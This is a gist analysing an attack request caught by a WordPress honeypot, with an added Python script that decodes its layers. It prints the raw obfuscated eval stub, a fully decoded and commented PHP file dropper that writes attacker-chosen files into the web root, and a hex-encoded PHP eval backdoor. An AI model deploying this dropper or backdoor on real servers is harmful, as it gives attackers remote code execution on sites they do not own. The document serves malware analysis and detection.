@dustyfresh
Last active February 15, 2018 15:22
analysis of one of the first payloads caught by HoneyPress

Interesting payload:

195.154.183.187 - - [12/Jun/2016 18:46:03] "coco=%40eval%2f**%2f(%24%7b%27_P%27.%27OST%27%7d%5bz9%5d%2f**%2f(%24%7b%27_POS%27.%27T%27%7d%5bz0%5d))%3b&z9=BaSE64_dEcOdE&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApOyRucGF0aD0kX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddLkJhU0U2NF9kRWNPZEUoJF9HRVRbJ3o0J10pO2Z1bmN0aW9uIGNyZWF0ZUZvbGRlcigkcGF0aCl7aWYoIWZpbGVfZXhpc3RzKCRwYXRoKSl7Y3JlYXRlRm9sZGVyKGRpcm5hbWUoJHBhdGgpKTtta2RpcigkcGF0aCwgMDc3Nyk7fX1jcmVhdGVGb2xkZXIoJG5wYXRoKTtlY2hvKCItPnwiKTs7JGM9JF9QT1NUWyJ6MiJdOyRmPSRucGF0aC5CYVNFNjRfZEVjT2RFKCRfR0VUWyJ6MyJdKTskYz1zdHJfcmVwbGFjZSgiXHIiLCIiLCRjKTskYz1zdHJfcmVwbGFjZSgiXG4iLCIiLCRjKTskYnVmPSIiO2ZvcigkaT0wOyRpPHN0cmxlbigkYyk7JGkrPTIpJGJ1Zi49dXJsZGVjb2RlKCIlIi5zdWJzdHIoJGMsJGksMikpO2VjaG8oQGZ3cml0ZShmb3BlbigkZiwidyIpLCRidWYpPyIxIjoiMCIpOztlY2hvKCJ8PC0iKTtkaWUoKTs%3d&z2=393839303030300D0A3C3F706870200D0A246D756A6A203D20245F504F53545B277A275D3B2069662028246D756A6A213D222229207B202478737365723D6261736536345F6465636F646528245F504F53545B277A30275D293B20406576616C28225C24736166656467203D202478737365723B22293B207D203F3EGET /wp-content/plugins/thumbnail.php HTTP/1.1" 404 -


Looks like there's some eval base64 shit going on here. URL-decoded, the coco parameter reads @eval/**/(${'_P'.'OST'}[z9]/**/(${'_POS'.'T'}[z0])); and since z9=BaSE64_dEcOdE, that is just eval(base64_decode($_POST['z0'])) with the function names split up to dodge simple string matching. Let's see what z0 is:

ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);$npath=$_SERVER['DOCUMENT_ROOT'].BaSE64_dEcOdE($_GET['z4']);function createFolder($path){if(!file_exists($path)){createFolder(dirname($path));mkdir($path, 0777);}}createFolder($npath);echo("->|");;$c=$_POST["z2"];$f=$npath.BaSE64_dEcOdE($_GET["z3"]);$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode("%".substr($c,$i,2));echo(@fwrite(fopen($f,"w"),$buf)?"1":"0");;echo("|<-");die();

Prettified:

<?php
// Decoded z0 stage: a file dropper. Errors are hidden and the time limit lifted
// before it touches the filesystem.
ini_set("display_errors", "0");
@set_time_limit(0);
@set_magic_quotes_runtime(0);

// Target directory: the web root plus an attacker-chosen, base64-encoded path (GET z4).
$npath = $_SERVER['DOCUMENT_ROOT'] . BaSE64_dEcOdE($_GET['z4']);

// Recursively create the directory chain, world-writable.
function createFolder($path)
{
    if (!file_exists($path)) {
        createFolder(dirname($path));
        mkdir($path, 0777);
    }
}

createFolder($npath);
echo ("->|");;   // opening delimiter the client parses the response with

// File contents arrive hex-encoded in POST z2; the file name, base64-encoded, in GET z3.
$c = $_POST["z2"];
$f = $npath . BaSE64_dEcOdE($_GET["z3"]);
$c = str_replace("\r", "", $c);
$c = str_replace("\n", "", $c);
$buf = "";

// Two hex digits at a time: urldecode("%XX") turns the string back into raw bytes.
for ($i = 0; $i < strlen($c); $i+= 2) $buf.= urldecode("%" . substr($c, $i, 2));

// Write the file, report 1/0 between the delimiters, and stop.
echo (@fwrite(fopen($f, "w") , $buf) ? "1" : "0");;
echo ("|<-");
die();
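As an added example (not part of the original gist), here is a small Python triage script that unpacks all three layers of this request the same way the backdoor and the dropper would: the URL-encoded coco stub, the base64 dropper in z0, and the hex-encoded file body in z2, which the gist stops short of decoding. The sample body is constructed from the log line above, with its z0 and z2 values copied verbatim.

```python
import base64
from urllib.parse import parse_qs

# Constructed sample: the POST body from the honeypot log line above, with the
# z0 and z2 values copied verbatim from it (the "GET /wp-content/..." text the
# log glued onto the end of z2 is left off).
SAMPLE_BODY = (
    "coco=%40eval%2f**%2f(%24%7b%27_P%27.%27OST%27%7d%5bz9%5d%2f**%2f"
    "(%24%7b%27_POS%27.%27T%27%7d%5bz0%5d))%3b&z9=BaSE64_dEcOdE&z0="
    "QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApOyRucGF0aD0kX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddLkJhU0U2NF9kRWNPZEUoJF9HRVRbJ3o0J10pO2Z1bmN0aW9uIGNyZWF0ZUZvbGRlcigkcGF0aCl7aWYoIWZpbGVfZXhpc3RzKCRwYXRoKSl7Y3JlYXRlRm9sZGVyKGRpcm5hbWUoJHBhdGgpKTtta2RpcigkcGF0aCwgMDc3Nyk7fX1jcmVhdGVGb2xkZXIoJG5wYXRoKTtlY2hvKCItPnwiKTs7JGM9JF9QT1NUWyJ6MiJdOyRmPSRucGF0aC5CYVNFNjRfZEVjT2RFKCRfR0VUWyJ6MyJdKTskYz1zdHJfcmVwbGFjZSgiXHIiLCIiLCRjKTskYz1zdHJfcmVwbGFjZSgiXG4iLCIiLCRjKTskYnVmPSIiO2ZvcigkaT0wOyRpPHN0cmxlbigkYyk7JGkrPTIpJGJ1Zi49dXJsZGVjb2RlKCIlIi5zdWJzdHIoJGMsJGksMikpO2VjaG8oQGZ3cml0ZShmb3BlbigkZiwidyIpLCRidWYpPyIxIjoiMCIpOztlY2hvKCJ8PC0iKTtkaWUoKTs%3d"
    "&z2=393839303030300D0A3C3F706870200D0A246D756A6A203D20245F504F53545B277A275D3B2069662028246D756A6A213D222229207B202478737365723D6261736536345F6465636F646528245F504F53545B277A30275D293B20406576616C28225C24736166656467203D202478737365723B22293B207D203F3E"
)


def lenient_b64decode(data: str) -> bytes:
    """Decode as the dropper's BaSE64_dEcOdE call does, but tolerate lost
    padding, which is common for values copied out of access logs."""
    data = data.strip().rstrip("=")
    return base64.b64decode(data + "=" * (-len(data) % 4))


def decode_hex_body(data: str) -> bytes:
    """Mirror the dropper's loop: drop CR/LF, then read two hex digits per byte
    (its urldecode("%" . substr($c, $i, 2)) trick is plain hex decoding)."""
    return bytes.fromhex(data.replace("\r", "").replace("\n", ""))


def unpack_stages(body: str) -> dict:
    """Return the three layers of the request in readable form:
    stage0: the PHP the backdoor evals (the URL-decoded coco parameter)
    stage1: the dropper script carried base64-encoded in z0
    stage2: the file the dropper would write, carried hex-encoded in z2
    """
    params = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    stages = {"stage0": params.get("coco", "")}
    stages["stage1"] = lenient_b64decode(params["z0"]).decode("latin-1") if "z0" in params else ""
    stages["stage2"] = decode_hex_body(params["z2"]).decode("latin-1") if "z2" in params else ""
    return stages


if __name__ == "__main__":
    for name, text in unpack_stages(SAMPLE_BODY).items():
        print(f"== {name} ({len(text)} chars) ==")
        print(text)
```

Decoding z2 shows the file being written is itself a tiny PHP eval backdoor keyed on POST z and z0, so the dropper's write into the web root, not just the first eval, is the event worth alerting on.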